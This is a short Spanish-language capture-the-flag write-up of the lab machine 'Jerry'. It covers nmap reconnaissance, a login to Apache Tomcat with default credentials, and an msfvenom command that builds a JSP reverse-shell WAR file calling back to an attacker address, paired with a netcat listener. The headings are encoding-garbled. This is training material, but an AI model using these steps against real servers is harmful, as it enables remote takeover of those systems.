# Jerry
### 馃攳 RECONOCIMIENTO
En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando:
```bash
ping -c 1 10.10.10.95
```
para verificar la conectividad de red.
A continuaci贸n, realizamos el comando:
```bash
nmap -sC -sV 10.10.10.95
```
para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Durante el escaneo se identificaron los siguientes puertos abiertos:
* **Puerto 8080 (HTTP)**: Se ha detectado un servidor web Apache Tomcat con la versi贸n 7.0.88 en ejecuci贸n. Esta versi贸n puede contener vulnerabilidades conocidas, por lo que se recomienda verificar exploits p煤blicos relacionados.
A continuaci贸n, se proceder谩 a analizar cada uno de estos servicios en busca de posibles vectores de ataque.
### 馃攷 EXPLORACI脫N
Se utiliza el comando:
```bash
sudo nmap -sCV -p8080 -v 10.10.10.95
```
para que nos proporcione m谩s informaci贸n sobre esos puertos espec铆ficamente.
Revisando el puerto 8080 nos encontramos con un Apache Tomcat por lo que nos intentamos loguear con las credenciales por defecto.
{% embed url="" %}
Nos logueamos con **admin**:**admin.**
Nos salen unas credenciales para loguearnos.
### 馃殌 **EXPLOTACI脫N**
Vemos que podemos subir archivos por lo que creamos uno malicioso.
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 -f war -o reverse2.war
```
Nos ponemos en escucha.
```
nc -nlvp 443
```
### 馃攼 **PRIVILEGIOS**
Al estar dentro y ejecutar:
```bash
whoami
```
somos **root.**
